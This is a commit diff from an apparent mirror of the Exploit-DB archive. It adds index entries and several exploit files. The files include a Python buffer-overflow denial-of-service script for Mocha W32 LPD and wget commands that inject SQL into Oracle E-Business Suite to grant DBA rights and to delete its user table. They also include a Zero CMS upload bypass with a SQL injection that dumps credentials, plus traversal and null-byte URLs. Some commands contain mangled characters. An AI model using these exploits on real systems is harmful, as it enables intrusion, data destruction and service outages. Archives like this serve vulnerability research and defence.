bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_24_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-24 04:37:29 +00:00
parent 603267f643
commit 8df8a23f16
6 changed files with 168 additions and 65 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -4504,7 +4504,7 @@ id,file,description,date,author,platform,type,port
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability",2008-01-07,Houssamix,php,webapps,0
4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
@ -30359,7 +30359,7 @@ id,file,description,date,author,platform,type,port
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
@ -30481,3 +30481,7 @@ id,file,description,date,author,platform,type,port
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0

Can't render this file because it is too large.

7
platforms/asp/webapps/33840.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39534/info
Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks.
http://www.example.com/manager/backup.asp?bck=./../file.asp

11
platforms/multiple/remote/33839.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39510/info
Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Oracle E-Business Suite 12 is vulnerable; other versions may be affected.
$ export TARGET=â?<3F>http://www.example.com:<port>/OA_HTMLâ?<3F>
$ wget -O - â??$TARGET/OA.jspâ?<3F> "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â?<3F>
$ wget -O - â??$TARGET/OA.jspâ?<3F> "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â?<3F>

126
platforms/php/webapps/4864.txt
View file

@ -1,63 +1,63 @@
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| ____ __________ __ ____ __ |
| /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
| | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
| | | | \ | |/ \ \___| | /_____/ | || | |
| |___|___| /\__| /______ /\___ >__| |___||__| |
| \/\______| \/ \/ |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Zero CMS Remote Arbitrary File Upload / SQL Injections |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.0 Alpha (Last) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Vendor: www.zero-cms.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Discovered by: KiNgOfThEwOrLd |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Intro: |
| |
| An attacker can bypass the avatar upload extension filter editing |
| the contenet type propriety |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Exploit: |
| |
| Submit to index.php?act=usercp&action=avatar a request like this: |
| |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
| \r\n |
| 20000\r\n |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="avupload"; filename=" |
| [FILENAME].[EVIL_EXTENSION]"\r\n |
| Content-Type: image/jpeg\r\n |
| \r\n |
| [EVIL_CODE]\n |
| \r\n |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="submit"\r\n |
| \r\n |
| Upload\r\n |
| -----------------------------4629606643545053171986629955-\r\n|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| SQL Injections: |
| |
| The most of the variable related with the database are not properly|
| checked. Then, we get a lots of possible sql injections. |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Some Examples: |
| |
| index.php?act=poll&mode=view&id=%27 |
| forums/index.php?f=%27 |
| forums/index.php?t=%27 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| An Exploit Example: |
| |
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Surelly there are other not filtred vars, but i don't feel like to |
| check, if u want u can find that yourself, dont you? :P |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
# milw0rm.com [2008-01-08]
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| ____ __________ __ ____ __ |
| /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
| | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
| | | | \ | |/ \ \___| | /_____/ | || | |
| |___|___| /\__| /______ /\___ >__| |___||__| |
| \/\______| \/ \/ |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Zero CMS Remote Arbitrary File Upload / SQL Injections |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.0 Alpha (Last) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Vendor: www.zero-cms.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Discovered by: KiNgOfThEwOrLd |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Intro: |
| |
| An attacker can bypass the avatar upload extension filter editing |
| the contenet type propriety |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Exploit: |
| |
| Submit to index.php?act=usercp&action=avatar a request like this: |
| |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
| \r\n |
| 20000\r\n |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="avupload"; filename=" |
| [FILENAME].[EVIL_EXTENSION]"\r\n |
| Content-Type: image/jpeg\r\n |
| \r\n |
| [EVIL_CODE]\n |
| \r\n |
| -----------------------------4629606643545053171986629955\r\n |
| Content-Disposition: form-data; name="submit"\r\n |
| \r\n |
| Upload\r\n |
| -----------------------------4629606643545053171986629955-\r\n|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| SQL Injections: |
| |
| The most of the variable related with the database are not properly|
| checked. Then, we get a lots of possible sql injections. |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Some Examples: |
| |
| index.php?act=poll&mode=view&id=%27 |
| forums/index.php?f=%27 |
| forums/index.php?t=%27 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| An Exploit Example: |
| |
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Surelly there are other not filtred vars, but i don't feel like to |
| check, if u want u can find that yourself, dont you? :P |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
# milw0rm.com [2008-01-08]

73
platforms/windows/dos/33838.py Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/39498/info
Mocha W32 LPD is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects W32 LPD 1.9; other versions may be vulnerable as well.
#!/usr/bin/python
# #################################################################
# Mocha LPD v1.9 Remote Buffer Overflow DoS PoC
# Author: mr_me
# Software Link: http://mochasoft.dk/lpd.htm
# Version: 1.9
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-023
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ##################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.
# ##################################################################
# Access violation here:
# MOV ECX,DWORD PTR DS:[EBX]
#
# The registers:
# EAX 00A2F978 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
# ECX 00006161
# EDX 00A20168
# EBX 61616161
# ESP 0012F4B8
# EBP 0012F6D4
# ESI 00A2F970 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
# EDI 61616161
# EIP 7C91AB8E ntdll.7C91AB8E
import sys, socket
print "********************************************************"
print " Mocha LPD Buffer Overflow DoS"
print " by mr_me"
print " http://net-ninja.net/ - mr_me(AT)corelan.be"
print "********************************************************"
if len(sys.argv) < 3:
print "Usage: " + sys.argv[0] + " <target ip> <port>"
sys.exit(0)
exploit = '\x05\x64\x65\x66\x61\x75\x6c\x74\x20'
exploit = '\x41' * 1500
exploit += '\x20\x61\x6c\x6c\x0a'
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect = s.connect((host,port))
except:
print "[-] Cant connect!"
s.send("\x02")
print "[+] Sending evil payload.. ph33r o.O"
s.send(exploit)
print '[+] Server DoSed!'
s.close()

8
platforms/windows/remote/33841.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/39544/info
HTTP File Server is prone to multiple vulnerabilities including a security-bypass issue and a denial-of-service issue.
Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions.
http://www.example.com/protected_folder/secret_file.txt%00
http://www.example.com/?search=%25%25